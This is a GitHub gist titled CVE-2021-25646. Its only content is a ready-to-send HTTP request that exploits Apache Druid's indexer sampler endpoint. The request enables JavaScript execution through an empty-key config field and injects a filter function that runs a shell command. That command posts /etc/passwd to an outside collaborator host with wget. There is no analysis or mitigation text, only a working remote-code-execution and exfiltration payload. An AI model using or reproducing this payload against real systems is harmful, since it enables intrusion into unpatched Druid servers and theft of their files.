Skip to content

Instantly share code, notes, and snippets.

@pikpikcu

pikpikcu/CVE-2021-25646.md

Last active January 10, 2022 12:32
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save pikpikcu/d208f19ea222efe21c4a6e6003d57069 to your computer and use it in GitHub Desktop.
Save pikpikcu/d208f19ea222efe21c4a6e6003d57069 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2021-25646
Raw
CVE-2021-25646.md 
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
                                        "function": "function(value){return java.lang.Runtime.getRuntime().exec('wget --post-file /etc/passwd burpcollaborator.net')}",
                                        "dimension": "added",
                                        "": {
                                                "enabled": "true"
                                        }
                                }
                        }
  },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment